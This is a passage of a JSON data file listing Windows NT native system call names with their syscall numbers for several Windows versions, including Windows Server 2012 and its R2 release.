"NtRenameTransactionManager": 316, "NtReplaceKey": 317, "NtReplacePartitionUnit": 318, "NtReplyWaitReplyPort": 319, "NtRequestPort": 320, "NtResetEvent": 321, "NtResetWriteWatch": 322, "NtRestoreKey": 323, "NtResumeProcess": 324, "NtRollbackComplete": 325, "NtRollbackEnlistment": 326, "NtRollbackTransaction": 327, "NtRollforwardTransactionManager": 328, "NtSaveKey": 329, "NtSaveKeyEx": 330, "NtSaveMergedKeys": 331, "NtSecureConnectPort": 332, "NtSerializeBoot": 333, "NtSetBootEntryOrder": 334, "NtSetBootOptions": 335, "NtSetContextThread": 336, "NtSetDebugFilterState": 337, "NtSetDefaultHardErrorPort": 338, "NtSetDefaultLocale": 339, "NtSetDefaultUILanguage": 340, "NtSetDriverEntryOrder": 341, "NtSetEaFile": 342, "NtSetHighEventPair": 343, "NtSetHighWaitLowEventPair": 344, "NtSetInformationDebugObject": 345, "NtSetInformationEnlistment": 346, "NtSetInformationJobObject": 347, "NtSetInformationKey": 348, "NtSetInformationResourceManager": 349, "NtSetInformationToken": 350, "NtSetInformationTransaction": 351, "NtSetInformationTransactionManager": 352, "NtSetInformationWorkerFactory": 353, "NtSetIntervalProfile": 354, "NtSetIoCompletion": 355, "NtSetIoCompletionEx": 356, "NtSetLdtEntries": 357, "NtSetLowEventPair": 358, "NtSetLowWaitHighEventPair": 359, "NtSetQuotaInformationFile": 360, "NtSetSecurityObject": 361, "NtSetSystemEnvironmentValue": 362, "NtSetSystemEnvironmentValueEx": 363, "NtSetSystemInformation": 364, "NtSetSystemPowerState": 365, "NtSetSystemTime": 366, "NtSetThreadExecutionState": 367, "NtSetTimerEx": 368, "NtSetTimerResolution": 369, "NtSetUuidSeed": 370, "NtSetVolumeInformationFile": 371, "NtShutdownSystem": 372, "NtShutdownWorkerFactory": 373, "NtSignalAndWaitForSingleObject": 374, "NtSinglePhaseReject": 375, "NtStartProfile": 376, "NtStopProfile": 377, "NtSuspendProcess": 378, "NtSuspendThread": 379, "NtSystemDebugControl": 380, "NtTerminateJobObject": 381, "NtTestAlert": 382, "NtThawRegistry": 383, "NtThawTransactions": 384, "NtTraceControl": 385, "NtTranslateFilePath": 386, "NtUmsThreadYield": 387, "NtUnloadDriver": 388, "NtUnloadKey": 389, "NtUnloadKey2": 390, "NtUnloadKeyEx": 391, "NtUnlockFile": 392, "NtUnlockVirtualMemory": 393, "NtVdmControl": 394, "NtWaitForDebugEvent": 395, "NtWaitForKeyedEvent": 396, "NtWaitForWorkViaWorkerFactory": 397, "NtWaitHighEventPair": 398, "NtWaitLowEventPair": 399, "NtWorkerFactoryWorkerReady": 400}, "SP1": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateReserveObject": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelIoFileEx": 134, "NtCancelSynchronousIoFile": 135, "NtCommitComplete": 136, "NtCommitEnlistment": 137, "NtCommitTransaction": 138, "NtCompactKeys": 139, "NtCompareTokens": 140, "NtCompleteConnectPort": 141, "NtCompressKey": 142, "NtConnectPort": 143, "NtCreateDebugObject": 144, "NtCreateDirectoryObject": 145, "NtCreateEnlistment": 146, "NtCreateEventPair": 147, "NtCreateIoCompletion": 148, "NtCreateJobObject": 149, "NtCreateJobSet": 150, "NtCreateKeyTransacted": 151, "NtCreateKeyedEvent": 152, "NtCreateMailslotFile": 153, "NtCreateMutant": 154, "NtCreateNamedPipeFile": 155, "NtCreatePagingFile": 156, "NtCreatePort": 157, "NtCreatePrivateNamespace": 158, "NtCreateProcess": 159, "NtCreateProfile": 160, "NtCreateProfileEx": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisableLastKnownGood": 183, "NtDisplayString": 184, "NtDrawText": 185, "NtEnableLastKnownGood": 186, "NtEnumerateBootEntries": 187, "NtEnumerateDriverEntries": 188, "NtEnumerateSystemEnvironmentValuesEx": 189, "NtEnumerateTransactionObject": 190, "NtExtendSection": 191, "NtFilterToken": 192, "NtFlushInstallUILanguage": 193, "NtFlushInstructionCache": 194, "NtFlushKey": 195, "NtFlushProcessWriteBuffers": 196, "NtFlushVirtualMemory": 197, "NtFlushWriteBuffer": 198, "NtFreeUserPhysicalPages": 199, "NtFreezeRegistry": 200, "NtFreezeTransactions": 201, "NtGetContextThread": 202, "NtGetCurrentProcessorNumber": 203, "NtGetDevicePowerState": 204, "NtGetMUIRegistryInfo": 205, "NtGetNextProcess": 206, "NtGetNextThread": 207, "NtGetNlsSectionPtr": 208, "NtGetNotificationResourceManager": 209, "NtGetPlugPlayEvent": 210, "NtGetWriteWatch": 211, "NtImpersonateAnonymousToken": 212, "NtImpersonateThread": 213, "NtInitializeNlsFiles": 214, "NtInitializeRegistry": 215, "NtInitiatePowerAction": 216, "NtIsSystemResumeAutomatic": 217, "NtIsUILanguageComitted": 218, "NtListenPort": 219, "NtLoadDriver": 220, "NtLoadKey": 221, "NtLoadKey2": 222, "NtLoadKeyEx": 223, "NtLockFile": 224, "NtLockProductActivationKeys": 225, "NtLockRegistryKey": 226, "NtLockVirtualMemory": 227, "NtMakePermanentObject": 228, "NtMakeTemporaryObject": 229, "NtMapCMFModule": 230, "NtMapUserPhysicalPages": 231, "NtModifyBootEntry": 232, "NtModifyDriverEntry": 233, "NtNotifyChangeDirectoryFile": 234, "NtNotifyChangeKey": 235, "NtNotifyChangeMultipleKeys": 236, "NtNotifyChangeSession": 237, "NtOpenEnlistment": 238, "NtOpenEventPair": 239, "NtOpenIoCompletion": 240, "NtOpenJobObject": 241, "NtOpenKeyEx": 242, "NtOpenKeyTransacted": 243, "NtOpenKeyTransactedEx": 244, "NtOpenKeyedEvent": 245, "NtOpenMutant": 246, "NtOpenObjectAuditAlarm": 247, "NtOpenPrivateNamespace": 248, "NtOpenProcessToken": 249, "NtOpenResourceManager": 250, "NtOpenSemaphore": 251, "NtOpenSession": 252, "NtOpenSymbolicLinkObject": 253, "NtOpenThread": 254, "NtOpenTimer": 255, "NtOpenTransaction": 256, "NtOpenTransactionManager": 257, "NtPlugPlayControl": 258, "NtPrePrepareComplete": 259, "NtPrePrepareEnlistment": 260, "NtPrepareComplete": 261, "NtPrepareEnlistment": 262, "NtPrivilegeCheck": 263, "NtPrivilegeObjectAuditAlarm": 264, "NtPrivilegedServiceAuditAlarm": 265, "NtPropagationComplete": 266, "NtPropagationFailed": 267, "NtPulseEvent": 268, "NtQueryBootEntryOrder": 269, "NtQueryBootOptions": 270, "NtQueryDebugFilterState": 271, "NtQueryDirectoryObject": 272, "NtQueryDriverEntryOrder": 273, "NtQueryEaFile": 274, "NtQueryFullAttributesFile": 275, "NtQueryInformationAtom": 276, "NtQueryInformationEnlistment": 277, "NtQueryInformationJobObject": 278, "NtQueryInformationPort": 279, "NtQueryInformationResourceManager": 280, "NtQueryInformationTransaction": 281, "NtQueryInformationTransactionManager": 282, "NtQueryInformationWorkerFactory": 283, "NtQueryInstallUILanguage": 284, "NtQueryIntervalProfile": 285, "NtQueryIoCompletion": 286, "NtQueryLicenseValue": 287, "NtQueryMultipleValueKey": 288, "NtQueryMutant": 289, "NtQueryOpenSubKeys": 290, "NtQueryOpenSubKeysEx": 291, "NtQueryPortInformationProcess": 292, "NtQueryQuotaInformationFile": 293, "NtQuerySecurityAttributesToken": 294, "NtQuerySecurityObject": 295, "NtQuerySemaphore": 296, "NtQuerySymbolicLinkObject": 297, "NtQuerySystemEnvironmentValue": 298, "NtQuerySystemEnvironmentValueEx": 299, "NtQuerySystemInformationEx": 300, "NtQueryTimerResolution": 301, "NtQueueApcThreadEx": 302, "NtRaiseException": 303, "NtRaiseHardError": 304, "NtReadOnlyEnlistment": 305, "NtRecoverEnlistment": 306, "NtRecoverResourceManager": 307, "NtRecoverTransactionManager": 308, "NtRegisterProtocolAddressInformation": 309, "NtRegisterThreadTerminatePort": 310, "NtReleaseKeyedEvent": 311, "NtReleaseWorkerFactoryWorker": 312, "NtRemoveIoCompletionEx": 313, "NtRemoveProcessDebug": 314, "NtRenameKey": 315, "NtRenameTransactionManager": 316, "NtReplaceKey": 317, "NtReplacePartitionUnit": 318, "NtReplyWaitReplyPort": 319, "NtRequestPort": 320, "NtResetEvent": 321, "NtResetWriteWatch": 322, "NtRestoreKey": 323, "NtResumeProcess": 324, "NtRollbackComplete": 325, "NtRollbackEnlistment": 326, "NtRollbackTransaction": 327, "NtRollforwardTransactionManager": 328, "NtSaveKey": 329, "NtSaveKeyEx": 330, "NtSaveMergedKeys": 331, "NtSecureConnectPort": 332, "NtSerializeBoot": 333, "NtSetBootEntryOrder": 334, "NtSetBootOptions": 335, "NtSetContextThread": 336, "NtSetDebugFilterState": 337, "NtSetDefaultHardErrorPort": 338, "NtSetDefaultLocale": 339, "NtSetDefaultUILanguage": 340, "NtSetDriverEntryOrder": 341, "NtSetEaFile": 342, "NtSetHighEventPair": 343, "NtSetHighWaitLowEventPair": 344, "NtSetInformationDebugObject": 345, "NtSetInformationEnlistment": 346, "NtSetInformationJobObject": 347, "NtSetInformationKey": 348, "NtSetInformationResourceManager": 349, "NtSetInformationToken": 350, "NtSetInformationTransaction": 351, "NtSetInformationTransactionManager": 352, "NtSetInformationWorkerFactory": 353, "NtSetIntervalProfile": 354, "NtSetIoCompletion": 355, "NtSetIoCompletionEx": 356, "NtSetLdtEntries": 357, "NtSetLowEventPair": 358, "NtSetLowWaitHighEventPair": 359, "NtSetQuotaInformationFile": 360, "NtSetSecurityObject": 361, "NtSetSystemEnvironmentValue": 362, "NtSetSystemEnvironmentValueEx": 363, "NtSetSystemInformation": 364, "NtSetSystemPowerState": 365, "NtSetSystemTime": 366, "NtSetThreadExecutionState": 367, "NtSetTimerEx": 368, "NtSetTimerResolution": 369, "NtSetUuidSeed": 370, "NtSetVolumeInformationFile": 371, "NtShutdownSystem": 372, "NtShutdownWorkerFactory": 373, "NtSignalAndWaitForSingleObject": 374, "NtSinglePhaseReject": 375, "NtStartProfile": 376, "NtStopProfile": 377, "NtSuspendProcess": 378, "NtSuspendThread": 379, "NtSystemDebugControl": 380, "NtTerminateJobObject": 381, "NtTestAlert": 382, "NtThawRegistry": 383, "NtThawTransactions": 384, "NtTraceControl": 385, "NtTranslateFilePath": 386, "NtUmsThreadYield": 387, "NtUnloadDriver": 388, "NtUnloadKey": 389, "NtUnloadKey2": 390, "NtUnloadKeyEx": 391, "NtUnlockFile": 392, "NtUnlockVirtualMemory": 393, "NtVdmControl": 394, "NtWaitForDebugEvent": 395, "NtWaitForKeyedEvent": 396, "NtWaitForWorkViaWorkerFactory": 397, "NtWaitHighEventPair": 398, "NtWaitLowEventPair": 399, "NtWorkerFactoryWorkerReady": 400}}, "Windows Server 2012": {"SP0": {"NtWorkerFactoryWorkerReady": 0, "NtMapUserPhysicalPagesScatter": 1, "NtWaitForSingleObject": 2, "NtCallbackReturn": 3, "NtReadFile": 4, "NtDeviceIoControlFile": 5, "NtWriteFile": 6, "NtRemoveIoCompletion": 7, "NtReleaseSemaphore": 8, "NtReplyWaitReceivePort": 9, "NtReplyPort": 10, "NtSetInformationThread": 11, "NtSetEvent": 12, "NtClose": 13, "NtQueryObject": 14, "NtQueryInformationFile": 15, "NtOpenKey": 16, "NtEnumerateValueKey": 17, "NtFindAtom": 18, "NtQueryDefaultLocale": 19, "NtQueryKey": 20, "NtQueryValueKey": 21, "NtAllocateVirtualMemory": 22, "NtQueryInformationProcess": 23, "NtWaitForMultipleObjects32": 24, "NtWriteFileGather": 25, "NtSetInformationProcess": 26, "NtCreateKey": 27, "NtFreeVirtualMemory": 28, "NtImpersonateClientOfPort": 29, "NtReleaseMutant": 30, "NtQueryInformationToken": 31, "NtRequestWaitReplyPort": 32, "NtQueryVirtualMemory": 33, "NtOpenThreadToken": 34, "NtQueryInformationThread": 35, "NtOpenProcess": 36, "NtSetInformationFile": 37, "NtMapViewOfSection": 38, "NtAccessCheckAndAuditAlarm": 39, "NtUnmapViewOfSection": 40, "NtReplyWaitReceivePortEx": 41, "NtTerminateProcess": 42, "NtSetEventBoostPriority": 43, "NtReadFileScatter": 44, "NtOpenThreadTokenEx": 45, "NtOpenProcessTokenEx": 46, "NtQueryPerformanceCounter": 47, "NtEnumerateKey": 48, "NtOpenFile": 49, "NtDelayExecution": 50, "NtQueryDirectoryFile": 51, "NtQuerySystemInformation": 52, "NtOpenSection": 53, "NtQueryTimer": 54, "NtFsControlFile": 55, "NtWriteVirtualMemory": 56, "NtCloseObjectAuditAlarm": 57, "NtDuplicateObject": 58, "NtQueryAttributesFile": 59, "NtClearEvent": 60, "NtReadVirtualMemory": 61, "NtOpenEvent": 62, "NtAdjustPrivilegesToken": 63, "NtDuplicateToken": 64, "NtContinue": 65, "NtQueryDefaultUILanguage": 66, "NtQueueApcThread": 67, "NtYieldExecution": 68, "NtAddAtom": 69, "NtCreateEvent": 70, "NtQueryVolumeInformationFile": 71, "NtCreateSection": 72, "NtFlushBuffersFile": 73, "NtApphelpCacheControl": 74, "NtCreateProcessEx": 75, "NtCreateThread": 76, "NtIsProcessInJob": 77, "NtProtectVirtualMemory": 78, "NtQuerySection": 79, "NtResumeThread": 80, "NtTerminateThread": 81, "NtReadRequestData": 82, "NtCreateFile": 83, "NtQueryEvent": 84, "NtWriteRequestData": 85, "NtOpenDirectoryObject": 86, "NtAccessCheckByTypeAndAuditAlarm": 87, "NtQuerySystemTime": 88, "NtWaitForMultipleObjects": 89, "NtSetInformationObject": 90, "NtCancelIoFile": 91, "NtTraceEvent": 92, "NtPowerInformation": 93, "NtSetValueKey": 94, "NtCancelTimer": 95, "NtSetTimer": 96, "NtAcceptConnectPort": 97, "NtAccessCheck": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientOfPort": 129, "NtAlpcOpenSenderProcess": 130, "NtAlpcOpenSenderThread": 131, "NtAlpcQueryInformation": 132, "NtAlpcQueryInformationMessage": 133, "NtAlpcRevokeSecurityContext": 134, "NtAlpcSendWaitReceivePort": 135, "NtAlpcSetInformation": 136, "NtAreMappedFilesTheSame": 137, "NtAssignProcessToJobObject": 138, "NtAssociateWaitCompletionPacket": 139, "NtCancelIoFileEx": 140, "NtCancelSynchronousIoFile": 141, "NtCancelWaitCompletionPacket": 142, "NtCommitComplete": 143, "NtCommitEnlistment": 144, "NtCommitTransaction": 145, "NtCompactKeys": 146, "NtCompareTokens": 147, "NtCompleteConnectPort": 148, "NtCompressKey": 149, "NtConnectPort": 150, "NtCreateDebugObject": 151, "NtCreateDirectoryObject": 152, "NtCreateDirectoryObjectEx": 153, "NtCreateEnlistment": 154, "NtCreateEventPair": 155, "NtCreateIRTimer": 156, "NtCreateIoCompletion": 157, "NtCreateJobObject": 158, "NtCreateJobSet": 159, "NtCreateKeyTransacted": 160, "NtCreateKeyedEvent": 161, "NtCreateLowBoxToken": 162, "NtCreateMailslotFile": 163, "NtCreateMutant": 164, "NtCreateNamedPipeFile": 165, "NtCreatePagingFile": 166, "NtCreatePort": 167, "NtCreatePrivateNamespace": 168, "NtCreateProcess": 169, "NtCreateProfile": 170, "NtCreateProfileEx": 171, "NtCreateResourceManager": 172, "NtCreateSemaphore": 173, "NtCreateSymbolicLinkObject": 174, "NtCreateThreadEx": 175, "NtCreateTimer": 176, "NtCreateToken": 177, "NtCreateTokenEx": 178, "NtCreateTransaction": 179, "NtCreateTransactionManager": 180, "NtCreateUserProcess": 181, "NtCreateWaitCompletionPacket": 182, "NtCreateWaitablePort": 183, "NtCreateWnfStateName": 184, "NtCreateWorkerFactory": 185, "NtDebugActiveProcess": 186, "NtDebugContinue": 187, "NtDeleteAtom": 188, "NtDeleteBootEntry": 189, "NtDeleteDriverEntry": 190, "NtDeleteFile": 191, "NtDeleteKey": 192, "NtDeleteObjectAuditAlarm": 193, "NtDeletePrivateNamespace": 194, "NtDeleteValueKey": 195, "NtDeleteWnfStateData": 196, "NtDeleteWnfStateName": 197, "NtDisableLastKnownGood": 198, "NtDisplayString": 199, "NtDrawText": 200, "NtEnableLastKnownGood": 201, "NtEnumerateBootEntries": 202, "NtEnumerateDriverEntries": 203, "NtEnumerateSystemEnvironmentValuesEx": 204, "NtEnumerateTransactionObject": 205, "NtExtendSection": 206, "NtFilterBootOption": 207, "NtFilterToken": 208, "NtFilterTokenEx": 209, "NtFlushBuffersFileEx": 210, "NtFlushInstallUILanguage": 211, "NtFlushInstructionCache": 212, "NtFlushKey": 213, "NtFlushProcessWriteBuffers": 214, "NtFlushVirtualMemory": 215, "NtFlushWriteBuffer": 216, "NtFreeUserPhysicalPages": 217, "NtFreezeRegistry": 218, "NtFreezeTransactions": 219, "NtGetCachedSigningLevel": 220, "NtGetContextThread": 221, "NtGetCurrentProcessorNumber": 222, "NtGetDevicePowerState": 223, "NtGetMUIRegistryInfo": 224, "NtGetNextProcess": 225, "NtGetNextThread": 226, "NtGetNlsSectionPtr": 227, "NtGetNotificationResourceManager": 228, "NtGetWriteWatch": 229, "NtImpersonateAnonymousToken": 230, "NtImpersonateThread": 231, "NtInitializeNlsFiles": 232, "NtInitializeRegistry": 233, "NtInitiatePowerAction": 234, "NtIsSystemResumeAutomatic": 235, "NtIsUILanguageComitted": 236, "NtListenPort": 237, "NtLoadDriver": 238, "NtLoadKey": 239, "NtLoadKey2": 240, "NtLoadKeyEx": 241, "NtLockFile": 242, "NtLockProductActivationKeys": 243, "NtLockRegistryKey": 244, "NtLockVirtualMemory": 245, "NtMakePermanentObject": 246, "NtMakeTemporaryObject": 247, "NtMapCMFModule": 248, "NtMapUserPhysicalPages": 249, "NtModifyBootEntry": 250, "NtModifyDriverEntry": 251, "NtNotifyChangeDirectoryFile": 252, "NtNotifyChangeKey": 253, "NtNotifyChangeMultipleKeys": 254, "NtNotifyChangeSession": 255, "NtOpenEnlistment": 256, "NtOpenEventPair": 257, "NtOpenIoCompletion": 258, "NtOpenJobObject": 259, "NtOpenKeyEx": 260, "NtOpenKeyTransacted": 261, "NtOpenKeyTransactedEx": 262, "NtOpenKeyedEvent": 263, "NtOpenMutant": 264, "NtOpenObjectAuditAlarm": 265, "NtOpenPrivateNamespace": 266, "NtOpenProcessToken": 267, "NtOpenResourceManager": 268, "NtOpenSemaphore": 269, "NtOpenSession": 270, "NtOpenSymbolicLinkObject": 271, "NtOpenThread": 272, "NtOpenTimer": 273, "NtOpenTransaction": 274, "NtOpenTransactionManager": 275, "NtPlugPlayControl": 276, "NtPrePrepareComplete": 277, "NtPrePrepareEnlistment": 278, "NtPrepareComplete": 279, "NtPrepareEnlistment": 280, "NtPrivilegeCheck": 281, "NtPrivilegeObjectAuditAlarm": 282, "NtPrivilegedServiceAuditAlarm": 283, "NtPropagationComplete": 284, "NtPropagationFailed": 285, "NtPulseEvent": 286, "NtQueryBootEntryOrder": 287, "NtQueryBootOptions": 288, "NtQueryDebugFilterState": 289, "NtQueryDirectoryObject": 290, "NtQueryDriverEntryOrder": 291, "NtQueryEaFile": 292, "NtQueryFullAttributesFile": 293, "NtQueryInformationAtom": 294, "NtQueryInformationEnlistment": 295, "NtQueryInformationJobObject": 296, "NtQueryInformationPort": 297, "NtQueryInformationResourceManager": 298, "NtQueryInformationTransaction": 299, "NtQueryInformationTransactionManager": 300, "NtQueryInformationWorkerFactory": 301, "NtQueryInstallUILanguage": 302, "NtQueryIntervalProfile": 303, "NtQueryIoCompletion": 304, "NtQueryLicenseValue": 305, "NtQueryMultipleValueKey": 306, "NtQueryMutant": 307, "NtQueryOpenSubKeys": 308, "NtQueryOpenSubKeysEx": 309, "NtQueryPortInformationProcess": 310, "NtQueryQuotaInformationFile": 311, "NtQuerySecurityAttributesToken": 312, "NtQuerySecurityObject": 313, "NtQuerySemaphore": 314, "NtQuerySymbolicLinkObject": 315, "NtQuerySystemEnvironmentValue": 316, "NtQuerySystemEnvironmentValueEx": 317, "NtQuerySystemInformationEx": 318, "NtQueryTimerResolution": 319, "NtQueryWnfStateData": 320, "NtQueryWnfStateNameInformation": 321, "NtQueueApcThreadEx": 322, "NtRaiseException": 323, "NtRaiseHardError": 324, "NtReadOnlyEnlistment": 325, "NtRecoverEnlistment": 326, "NtRecoverResourceManager": 327, "NtRecoverTransactionManager": 328, "NtRegisterProtocolAddressInformation": 329, "NtRegisterThreadTerminatePort": 330, "NtReleaseKeyedEvent": 331, "NtReleaseWorkerFactoryWorker": 332, "NtRemoveIoCompletionEx": 333, "NtRemoveProcessDebug": 334, "NtRenameKey": 335, "NtRenameTransactionManager": 336, "NtReplaceKey": 337, "NtReplacePartitionUnit": 338, "NtReplyWaitReplyPort": 339, "NtRequestPort": 340, "NtResetEvent": 341, "NtResetWriteWatch": 342, "NtRestoreKey": 343, "NtResumeProcess": 344, "NtRollbackComplete": 345, "NtRollbackEnlistment": 346, "NtRollbackTransaction": 347, "NtRollforwardTransactionManager": 348, "NtSaveKey": 349, "NtSaveKeyEx": 350, "NtSaveMergedKeys": 351, "NtSecureConnectPort": 352, "NtSerializeBoot": 353, "NtSetBootEntryOrder": 354, "NtSetBootOptions": 355, "NtSetCachedSigningLevel": 356, "NtSetContextThread": 357, "NtSetDebugFilterState": 358, "NtSetDefaultHardErrorPort": 359, "NtSetDefaultLocale": 360, "NtSetDefaultUILanguage": 361, "NtSetDriverEntryOrder": 362, "NtSetEaFile": 363, "NtSetHighEventPair": 364, "NtSetHighWaitLowEventPair": 365, "NtSetIRTimer": 366, "NtSetInformationDebugObject": 367, "NtSetInformationEnlistment": 368, "NtSetInformationJobObject": 369, "NtSetInformationKey": 370, "NtSetInformationResourceManager": 371, "NtSetInformationToken": 372, "NtSetInformationTransaction": 373, "NtSetInformationTransactionManager": 374, "NtSetInformationVirtualMemory": 375, "NtSetInformationWorkerFactory": 376, "NtSetIntervalProfile": 377, "NtSetIoCompletion": 378, "NtSetIoCompletionEx": 379, "NtSetLdtEntries": 380, "NtSetLowEventPair": 381, "NtSetLowWaitHighEventPair": 382, "NtSetQuotaInformationFile": 383, "NtSetSecurityObject": 384, "NtSetSystemEnvironmentValue": 385, "NtSetSystemEnvironmentValueEx": 386, "NtSetSystemInformation": 387, "NtSetSystemPowerState": 388, "NtSetSystemTime": 389, "NtSetThreadExecutionState": 390, "NtSetTimerEx": 391, "NtSetTimerResolution": 392, "NtSetUuidSeed": 393, "NtSetVolumeInformationFile": 394, "NtShutdownSystem": 395, "NtShutdownWorkerFactory": 396, "NtSignalAndWaitForSingleObject": 397, "NtSinglePhaseReject": 398, "NtStartProfile": 399, "NtStopProfile": 400, "NtSubscribeWnfStateChange": 401, "NtSuspendProcess": 402, "NtSuspendThread": 403, "NtSystemDebugControl": 404, "NtTerminateJobObject": 405, "NtTestAlert": 406, "NtThawRegistry": 407, "NtThawTransactions": 408, "NtTraceControl": 409, "NtTranslateFilePath": 410, "NtUmsThreadYield": 411, "NtUnloadDriver": 412, "NtUnloadKey": 413, "NtUnloadKey2": 414, "NtUnloadKeyEx": 415, "NtUnlockFile": 416, "NtUnlockVirtualMemory": 417, "NtUnmapViewOfSectionEx": 418, "NtUnsubscribeWnfStateChange": 419, "NtUpdateWnfStateData": 420, "NtVdmControl": 421, "NtWaitForAlertByThreadId": 422, "NtWaitForDebugEvent": 423, "NtWaitForKeyedEvent": 424, "NtWaitForWnfNotifications": 425, "NtWaitForWorkViaWorkerFactory": 426, "NtWaitHighEventPair": 427, "NtWaitLowEventPair": 428}, "R2": {"NtWorkerFactoryWorkerReady": 0, "NtAcceptConnectPort": 1, "NtMapUserPhysicalPagesScatter": 2, "NtWaitForSingleObject": 3, "NtCallbackReturn": 4, "NtReadFile": 5, "NtDeviceIoControlFile": 6, "NtWriteFile": 7, "NtRemoveIoCompletion": 8, "NtReleaseSemaphore": 9, "NtReplyWaitReceivePort": 10, "NtReplyPort": 11, "NtSetInformationThread": 12, "NtSetEvent": 13, "NtClose": 14, "NtQueryObject": 15, "NtQueryInformationFile": 16, "NtOpenKey": 17, "NtEnumerateValueKey": 18, "NtFindAtom": 19, "NtQueryDefaultLocale": 20, "NtQueryKey": 21, 